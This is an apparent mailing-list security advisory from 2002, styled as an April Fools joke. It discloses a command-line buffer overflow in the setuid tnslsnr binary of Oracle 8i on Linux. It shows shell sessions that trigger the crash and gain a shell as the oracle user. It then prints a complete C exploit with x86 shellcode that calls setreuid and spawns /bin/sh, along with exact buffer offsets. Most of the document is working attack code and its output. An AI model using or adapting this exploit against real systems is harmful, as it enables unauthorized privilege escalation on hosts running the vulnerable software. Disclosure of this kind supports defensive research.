This is ment to be an April fools joke but if you still use old Oracle
its not to funny I guess:

After I ate a few too many hard boiled eggs this weekend I decided to
install Oracle and play with it a little. Being poor I didn't have 800
bones to shell out on Oracle 16i so I had to settle with oldschool
Oracle 8i from this little mom and pop shop on my corner. They just
happened to have a copy that would run on linux and it was only 50 bucks
so I bought it! After the install no more than 10 minutes later I found
an issue... I figured that most anything I would have found would
already be public knowlege or it was patched up somewhere along the way
to the current product version. Well from what I can tell this is an
unknown issue.

TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53

[itchieghetto itchie]$ ls -al
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x 1 oracle oracle 4399723 Jun 11 1999
/home/u01/app/oracle/product/8.1.5/bin/tnslsnr

There were holes reported on the abuse of $ORACLE_HOME....
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with but these appeared patched on this install
so I didn't bother trying to use env variables as abuse

[dotslashghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
[dotslashghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)

The first thing abnormal I tried hit right on the money... simple
cmdline b0f
[dotslashghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
`perl -e 'print "A" x 9000'`
Segmentation fault

Of course I had to give one of my developers a quick ring and try to
harass him to stop molesting the eater bunny and take a second to code
me up an exploit. Much obliged "The Itch" took about 10 minutes
(literally) to come up with the following...

Happy Easter! and April Fools?!

[itchieghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchieghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchieghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffaf4
Using buffersize : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)

-KF

/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslashsnosoft.com if you wish to participate in vuln research.
 *
 * - The Itch
 * - itchiepromisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more then 2132 bytes into the
 * buffer at the command line 2128 to overwrite ebp, 2132 to
 * overwrite eip).
 * 2). If you write more then 2132 bytes, other frames will be
 * overwritten afterwards and will mess up your flow of arbitrary code
 * execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */

#include <stdio.h>
#include <stdlib.h>

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133

/* Shellcode made by r0z (r0zpromisc.org) */
char shellcode[] =
         "\x31\xdb" /* xor %ebx, %ebx */
         "\x31\xc9" /* xor %ecx, %ecx */
         "\xf7\xe3" /* mul %ebx */
         "\xb0\x46" /* mov $0x46, %al */
         "\x66\xbb\x03\x02" /* mov $0x1fc, %bx */
         "\x49" /* dec %ecx */
         "\xcd\x80" /* int $0x80 */
         "\x31\xd2" /* xor %edx, %edx */
         "\x52" /* push %edx */
         "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
         "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
         "\x89\xe3" /* mov %esp, %ebx */
         "\x52" /* push %edx */
         "\x53" /* push %ebx */
         "\x89\xe1" /* mov %esp, %ecx */
         "\x6a\x0b" /* pushl $0xb */
         "\x58" /* pop %eax */
         "\xcd\x80"; /* int $0x80 */

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        long addr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        int get_sp = (int)&get_sp;

        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("Oracle tnslsrn 8.1.5\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize : %d\n", bsize - 1);

        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);
        buff[bsize - 1 ]= '\0';
        execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
              "tnslsnr", buff, 0);
        return 0;
}

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]